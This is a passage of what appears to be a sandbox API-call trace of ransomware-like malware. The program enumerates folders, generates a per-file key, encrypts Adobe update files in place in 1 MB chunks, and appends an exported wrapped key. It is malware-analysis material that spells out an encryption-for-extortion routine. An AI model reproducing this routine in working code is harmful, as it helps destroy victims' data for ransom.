lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.198] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.198] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.198] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0139.198] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0139.198] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Cultures\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0139.198] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.198] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.198] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0139.198] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Office Setup Controller\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0139.199] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.199] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0139.199] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0139.199] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0139.199] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0139.200] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0139.200] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0139.200] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0139.200] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.200] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.200] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0139.200] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0139.200] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0139.200] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0139.201] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0139.202] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0139.204] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0139.207] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0139.208] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0139.208] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0139.208] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\en-US\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0139.209] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.209] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0139.209] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0139.209] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\WksConv\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0139.209] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.209] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.209] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0139.209] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0139.209] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0139.698] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=251904) returned 1 [0139.698] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=251904) returned 1 [0139.699] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x3d6de, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.699] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0139.700] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.700] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0139.700] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0139.700] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.700] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x3d800, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x3d800, lpOverlapped=0x0) returned 1 [0139.704] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0139.705] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x3d800, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x3d810) returned 1 [0139.707] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.708] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x3d810, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x3d810, lpOverlapped=0x0) returned 1 [0139.708] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0139.708] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0139.708] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0139.709] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0139.709] CloseHandle (hObject=0x18c) returned 1 [0139.721] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0139.725] CryptDestroyKey (hKey=0x3b8690) returned 1 [0139.725] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0139.725] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0139.725] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0139.725] SetFileAttributesW (lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp", dwFileAttributes=0x80) returned 1 [0139.726] CreateFileW (lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrupd10110_mui.msp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0139.726] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=17707008) returned 1 [0139.726] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=17707008) returned 1 [0139.726] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x10e2ede, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.726] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0139.727] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.727] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0139.727] SetFilePointer (in: hFile=0x18c, lDistanceToMove=3000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2dc6c0 [0139.727] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac888, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac888*, lpNumberOfBytesRead=0x29ac858*=0x10, lpOverlapped=0x0) returned 1 [0139.729] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.729] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0139.729] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.729] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0xf4240, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0xf4240, lpOverlapped=0x0) returned 1 [0139.750] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240) returned 1 [0139.750] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0xf4240, dwBufLen=0xf4240 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0xf4240) returned 1 [0139.757] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.757] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xf4240, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0xf4240, lpOverlapped=0x0) returned 1 [0139.760] SetFilePointer (in: hFile=0x18c, lDistanceToMove=1000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf4240 [0139.760] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0xf4240, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0xf4240, lpOverlapped=0x0) returned 1 [0139.774] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240) returned 1 [0139.774] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0xf4240, dwBufLen=0xf4240 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0xf4240) returned 1 [0139.780] SetFilePointer (in: hFile=0x18c, lDistanceToMove=1000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf4240 [0139.780] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xf4240, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0xf4240, lpOverlapped=0x0) returned 1 [0139.783] SetFilePointer (in: hFile=0x18c, lDistanceToMove=2000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e8480 [0139.783] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0xf4240, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0xf4240, lpOverlapped=0x0) returned 1 [0139.813] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240) returned 1 [0139.813] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0xf4240, dwBufLen=0xf4240 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0xf4240) returned 1 [0139.823] SetFilePointer (in: hFile=0x18c, lDistanceToMove=2000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e8480 [0139.823] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xf4240, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0xf4240, lpOverlapped=0x0) returned 1 [0139.827] SetFilePointer (in: hFile=0x18c, lDistanceToMove=3000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2dc6c0 [0139.827] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x0, lpOverlapped=0x0) returned 1 [0139.827] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0139.827] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x0, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x10) returned 1 [0139.827] SetFilePointer (in: hFile=0x18c, lDistanceToMove=3000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2dc6c0 [0139.827] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x10, lpOverlapped=0x0) returned 1 [0139.827] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2 | out: lpNewFilePointer=0x0) returned 1 [0139.827] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0xa, lpOverlapped=0x0) returned 1 [0139.828] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0139.828] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0139.828] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0139.828] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2 | out: lpNewFilePointer=0x0) returned 1 [0139.828] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac888*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac888*, lpNumberOfBytesWritten=0x29ac858*=0x10, lpOverlapped=0x0) returned 1 [0139.828] CloseHandle (hObject=0x18c) returned 1 [0140.145] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.149] CryptDestroyKey (hKey=0x3b8690) returned 1 [0140.149] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.149] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.149] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.149] SetFileAttributesW (lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp", dwFileAttributes=0x80) returned 1 [0140.150] CreateFileW (lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrupd10116_mui.msp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0140.150] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=17420288) returned 1 [0140.150] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=17420288) returned 1 [0140.150] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x109cede, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.150] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0140.151] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.151] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0140.151] SetFilePointer (in: hFile=0x18c, lDistanceToMove=3000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2dc6c0 [0140.151] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac888, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac888*, lpNumberOfBytesRead=0x29ac858*=0x10, lpOverlapped=0x0) returned 1 [0140.152] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.152] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0140.153] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.153] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0xf4240, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0xf4240, lpOverlapped=0x0) returned 1 [0140.170] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240) returned 1 [0140.170] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0xf4240, dwBufLen=0xf4240 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0xf4240) returned 1 [0140.176] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.176] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xf4240, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0xf4240, lpOverlapped=0x0) returned 1 [0140.178] SetFilePointer (in: hFile=0x18c, lDistanceToMove=1000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf4240 [0140.179] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0xf4240, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0xf4240, lpOverlapped=0x0) returned 1 [0140.193] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240) returned 1 [0140.193] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0xf4240, dwBufLen=0xf4240 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0xf4240) returned 1 [0140.199] SetFilePointer (in: hFile=0x18c, lDistanceToMove=1000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf4240 [0140.199] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xf4240, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0xf4240, lpOverlapped=0x0) returned 1 [0140.202] SetFilePointer (in: hFile=0x18c, lDistanceToMove=2000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e8480 [0140.202] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0xf4240, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0xf4240, lpOverlapped=0x0) returned 1 [0140.224] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240) returned 1 [0140.224] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0xf4240, dwBufLen=0xf4240 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0xf4240) returned 1 [0140.234] SetFilePointer (in: hFile=0x18c, lDistanceToMove=2000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e8480 [0140.234] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xf4240, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0xf4240, lpOverlapped=0x0) returned 1 [0140.238] SetFilePointer (in: hFile=0x18c, lDistanceToMove=3000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2dc6c0 [0140.238] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x0, lpOverlapped=0x0) returned 1 [0140.238] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0140.238] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x0, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x10) returned 1 [0140.238] SetFilePointer (in: hFile=0x18c, lDistanceToMove=3000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2dc6c0 [0140.238] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x10, lpOverlapped=0x0) returned 1 